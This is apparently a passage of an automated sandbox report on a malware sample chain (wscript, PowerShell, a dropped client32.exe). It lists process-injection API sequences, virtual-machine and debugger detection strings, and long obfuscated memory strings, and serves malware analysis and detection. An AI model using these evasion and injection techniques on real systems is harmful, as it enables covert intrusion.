                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,10_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,10_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,10_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,10_2_1106ABD0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: HTCTL32.DLL.8.drBinary or memory string: VMware
                                Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PDuBqHlSjfaVBDljTqJqWwFvbyyYxZZCDHswZoXzfiRzqceWjecZmjqgnptSIHaqnCXIzYoKTXqRGLtxllycZdMCKnMRTfTfsAZHjDGmKpuzSQIiYPHJSPpQYsWysXIPUVifMnfPvGLyMfTgshOjQCIanDeTRUsMkGWyAGJtvEpjqczQOLxKFRBNnXTsOrAofFlTAQWFWJjkyYNSfcoNAptziWrqsxamtFHcFWLWFhutsZHMlpqciouqTJteqqmnxengSfwNrqjvRvnwyeeLliSvcaXJOVmMGYkALPiTFVBHCkjuKbGJlgbZuyCFqdVkRgDViFOGJhYlwKygomLINmgRDtlKaRTEEFxNZOCYJTAMdPOhzpcyQLLROPndlsbXpzXZwgxnFcMKoLMeCfAxujbcQuPyByLRZVbJJzvSwkMuKOevWjDDBlOfBNYOEzyLriAaLxupslqNYsqSRZvguXeuootrrbMgOaiEcMnERuqauhkUjnHPdhelIcJwLkYTwWWEHMYzbaTQrqIfvjkNqjwPeYvWDKWcrouaVhIPTDlzatNyKyhHPUUHHsVEvcYafrsrMaWzSGxyhIXlYPvsfCwskecJgoGXDfXjCxcdrgaWlxkEQQAfibyEgRJGXEAWEiPveLpJKfyzltKBsyWxKjbGHHRDDkIsBhYIZQKWbyZJwZqnOCcPqNlYPklUPYBLauMligHZpgSttJHkqZqDNuRdOgJFyicaZyrACqijTHDVNXCQqQzPYFjyCFlLEAaUZYOtQBYvFAqsSTmSYnkfkzgMWqFUZXoTRBFzpWwpvyjhiQhgpOuxfCWxzafCNaAfhsuoWCTnrrAKAAskRsYFWGHiZjhRyKgkFABzDYIkkIFPZbJtlIQSoMSqbJWZnWFNRRsnmgRbxSpTdmqYBmqMxUddsaOcyREuoCdPKkrXyRuUtkIsIxgetNUvGkSIDOiaMNbeWMOrNvayRYaIdtBLdKOGyiDSEZlGzHhPxOKVdExlQqlpoZsFWqhPwFqesgPEINDsGcMTXODNTkZtIAQUvNrkkbiixVaFZQLGVGJeMKeDPpsvvSbMwSFQmkqjvDbByOuPaeVDFERfpAJCRSJJzchlkIfWgXnHDIRKHCsiVSmGEgNhVkIPqUrlZIBuwBZXGiTIOxIFaYhgsWsLyfOfPBjfXJhIlnMvckylHikUfURHflPjXOGGMLzlOWEcCXDwkBIZkBOTdqTshrNFfvsnifppkahlOkpGpHvvttjjiQJeSSXVMhMdLTdubCpXtyJFGIHwswLEXSGvvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBS
                                Source: HTCTL32.DLL.8.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CKnMRTfTfsAZHjDGmKpuzSQIiYPHJSPpQYsWysXIPUVifMnfPvGLyMfTgshOjQCIanDeTRUsMkGWyAGJtvEpjqczQOLxKFRBNnXTsOrAofFlTAQWFWJjkyYNSfcoNAptziWrqsxamtFHcFWLWFhutsZHMlpqciouqTJteqqmnxengSfwNrqjvRvnwyeeLliSvcaXJOVmMGYkALPiTFVBHCkjuKbGJlgbZuyCFqdVkRgDViFOGJhYlwKygomLINmgRDtlKaRTEEFxNZOCYJTAMdPOhzpcyQLLROPndlsbXpzXZwgxnFcMKoLMeCfAxujbcQuPyByLRZVbJJzvSwkMuKOevWjDDBlOfBNYOEzyLriAaLxupslqNYsqSRZvguXeuootrrbMgOaiEcMnERuqauhkUjnHPdhelIcJwLkYTwWWEHMYzbaTQrqIfvjkNqjwPeYvWDKWcrouaVhIPTDlzatNyKyhHPUUHHsVEvcYafrsrMaWzSGxyhIXlYPvsfCwskecJgoGXDfXjCxcdrgaWlxkEQQAfibyEgRJGXEAWEiPveLpJKfyzltKBsyWxKjbGHHRDDkIsBhYIZQKWbyZJwZqnOCcPqNlYPklUPYBLauMligHZpgSttJHkqZqDNuRdOgJFyicaZyrACqijTHDVNXCQqQzPYFjyCFlLEAaUZYOtQBYvFAqsSTmSYnkfkzgMWqFUZXoTRBFzpWwpvyjhiQhgpOuxfCWxzafCNaAfhsuoWCTnrrAKAAskRsYFWGHiZjhRyKgkFABzDYIkkIFPZbJtlIQSoMSqbJWZnWFNRRsnmgRbxSpTdmqYBmqMxUddsaOcyREuoCdPKkrXyRuUtkIsIxgetNUvGkSIDOiaMNbeWMOrNvayRYaIdtBLdKOGyiDSEZlGzHhPxOKVdExlQqlpoZsFWqhPwFqesgPEINDsGcMTXODNTkZtIAQUvNrkkbiixVaFZQLGVGJeMKeDPpsvvSbMwSFQmkqjvDbByOuPaeVDFERfpAJCRSJJzchlkIfWgXnHDIRKHCsiVSmGEgNhVkIPqUrlZIBuwBZXGiTIOxIFaYhgsWsLyfOfPBjfXJhIlnMvckylHikUfURHflPjXOGGMLzlOWEcCXDwkBIZkBOTdqTshrNFfvsnifppkahlOkpGpHvvttjjiQJeSSXVMhMdLTdubCpXtyJFGIHwswLEXSGvvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMS
                                Source: TCCTL32.DLL.8.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: client32.exe, 0000000A.00000003.1539891812.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523977080.0000000005992000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526874385.0000000005990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnD
                                Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfwqQlqscfvhvLKUmoCJTUjavgmbKBLMFpvEFsrJtdVVvtcmuwHTEMvBDXgipznDWsaHTvtYDQcOofS
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC57262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526350208.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1539453940.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523563518.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2491283544.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.8.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.8.drBinary or memory string: VMWare
                                Source: wscript.exe, 00000000.00000003.1356978287.000001FC57DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfwqQlqscfvhvLKUmoCJTUjavgmbKBLMFpvEFsrJtdVVvtcmuwHTEMvBDXgipznDWsaHTvtYDQcOof
                                Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfwS
                                Source: wscript.exe, 00000000.00000003.1356978287.000001FC57E51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfw
                                Source: powershell.exe, 00000008.00000002.1840183751.0000026C752E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: powershell.exe, 00000008.00000002.1840183751.0000026C751C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeAPI call chain: ExitProcess graph end nodegraph_10-72329
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeAPI call chain: ExitProcess graph end nodegraph_10-71807
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_11162BB7
